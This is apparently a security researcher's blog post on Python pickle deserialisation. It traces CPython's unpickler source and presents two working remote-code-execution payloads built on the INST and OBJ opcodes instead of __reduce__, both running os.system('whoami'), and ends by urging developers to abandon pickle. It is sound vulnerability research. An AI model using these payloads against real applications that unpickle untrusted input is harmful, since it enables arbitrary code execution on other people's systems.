<-- home

Python Pickle RCE without __reduce__

I asked DALL-E for 'Pickle looking pythons' but the results were way too phallic

“Every single pickle deserialisation payload uses __reduce__ … I wonder if it’s possible to get RCE without it”

And that’s how I nerdsniped myself and lost 5h of my life.


Yes, it’s possible, here are two functional payloads:

>>> inst_bomb
>>> pickletools.dis(inst_bomb)
    0: (    MARK
    1: S        STRING     'whoami'
   11: i        INST       'os system' (MARK at 0)
   22: .    STOP
highest protocol among opcodes = 0
>>> pickle.loads(inst_bomb)
>>> obj_bomb
>>> pickletools.dis(obj_bomb)
    0: (    MARK
    1: c        GLOBAL     'os system'
   12: S        STRING     'whoami'
   22: o        OBJ        (MARK at 0)
   23: .    STOP
highest protocol among opcodes = 1
>>> pickle.loads(obj_bomb)

Foreword #

This blog post won’t explain:

However, what it will detail is how the REDUCE primitive could have been found and how to find novel (to my knowledge) exploit primitives.

For some additional reading, here are links to the best research done on pickle deserialization.

  • Dangerous pickles — malicious python serialization [blog]: Already linked above, the best article to date on pickle deserialization, very well explained.
  • Never a dill moment: Exploiting machine learning pickle files [blog] [conf]: On the resurgence in the use of pickle for Machine Learning and its security implications.
  • Pain Pickle: Systemically bypassing restricted unpickle [conf] [slides]: Great research (in Cantonese) on how to systematically bypass RestrictedUnpicklers to achieve RCE.

The REDUCE primitive #

Before looking for new exploit paths it’s a good idea to first understand how the existing one works by diving into the source code.

NB: Pre-existing comments in the source code have been removed for the sake of clarity.

When a REDUCE opcode is read, the main fetch-decode-execute loop calls the corresponding function (load_reduce).

def load_reduce(self):
    stack = self.stack
    args = stack.pop()      # pop args (tuple) top of the stack
    func = stack[-1]        # get value from top of the stack (function)
    stack[-1] = func(*args) # call func with args -> RCE
                            # arg1(*arg2) is a pattern that will come back later.

The load_reduce function requires a function to have already been pushed onto the stack. There are a few ways of doing this, the easiest being to use either the GLOBAL or STACK_GLOBAL instructions. Both corresponding functions work in a very similar way, load_global reads the module/name variables as strings whilst load_stack_global loads the values off of the stack.

def load_global(self):
    module = self.readline()[:-1].decode("utf-8") # read module string
    name = self.readline()[:-1].decode("utf-8")   # read name string
    klass = self.find_class(module, name)         # call find_class
    self.append(klass)                            # append result to stack

The call to find_class seems to be the important part of the function so let’s investigate.

N.B: Since the PROTO opcode (protocol version, 0 by default) is optional and has no real influence on the program flow it has been omitted from the given payloads for the sake of brevity.

def find_class(self, module, name):
    sys.audit('pickle.find_class', module, name)
    if self.proto < 3 and self.fix_imports:
        # fix the imports
    __import__(module, level=0)                   # import the module
    if self.proto >= 4:                           # both branchs do the same thing
        return _getattribute(sys.modules[module], name)[0]
        return getattr(sys.modules[module], name) # return module.function

Being able to import functions and specific modules is an extremely useful primitive, thus the search for a REDUCE-less payload started by looking for functions calling find_class.

The INST primitive #

The only other interesting function that calls find_class is the load_inst function.

def load_inst(self):
    module = self.readline()[:-1].decode("ascii") # read module string
    name = self.readline()[:-1].decode("ascii")   # read name string
    klass = self.find_class(module, name)         # call find_class
    self._instantiate(klass, self.pop_mark())     # call _instantiate

The function ends with a call to _instantiate.

def _instantiate(self, klass, args):
    if (args or not isinstance(klass, type) or
        hasattr(klass, "__getinitargs__")):
            value = klass(*args)   # the arg1(*arg2) pattern reemerges 
        except TypeError as err:
            raise TypeError("in constructor for %s: %s" %
                            (klass.__name__, str(err)), sys.exc_info()[2])
        value = klass.__new__(klass)

Just like with load_reduce, _instantiate takes a function (klass) and a tuple (args) as parameters and calls the function with the tuple’s values as arguments (func(*args)), allowing for arbitrary code execution. Below is an annotated example payload:

>>> pickletools.dis(b'(S"whoami"\nios\nsystem\n.', annotate=1)
    0: (    MARK Push markobject onto the stack.
    1: S        STRING     'whoami' Push a Python string object.
   11: i        INST       'os system' (MARK at 0) Build a class instance.
   22: .    STOP                                   Stop the unpickling machine.
highest protocol among opcodes = 0
>>> pickle.loads(b'(S"whoami"\nios\nsystem\n.')

The OBJ primitive #

The search for other functions calling _instantiate yielded only a single other function: load_obj.

def load_obj(self):
    args = self.pop_mark()
    cls = args.pop(0)
    self._instantiate(cls, args)

It works in a very similar way to load_reduce: the function gets two variables, one containing a function and the other containing a tuple of arguments, and calls the function with the arguments. Below is an annotated example payload:

>>> pickletools.dis(b'(cos\nsystem\nS"whoami"\no.')
    0: (    MARK Push markobject onto the stack.
    1: c        GLOBAL     'os system' Push a global object (module.attr) on the stack.
   12: S        STRING     'whoami'    Push a Python string object.
   22: o        OBJ        (MARK at 0) Build a class instance.
   23: .    STOP                       Stop the unpickling machine.
highest protocol among opcodes = 1
>>> pickle.loads(b'(cos\nsystem\nS"whoami"\no.')

Please stop using pickle, attempts to make pickle secure are meaningless (except for adding data signing with HMAC I guess) as the hacker will forever subvert the developer.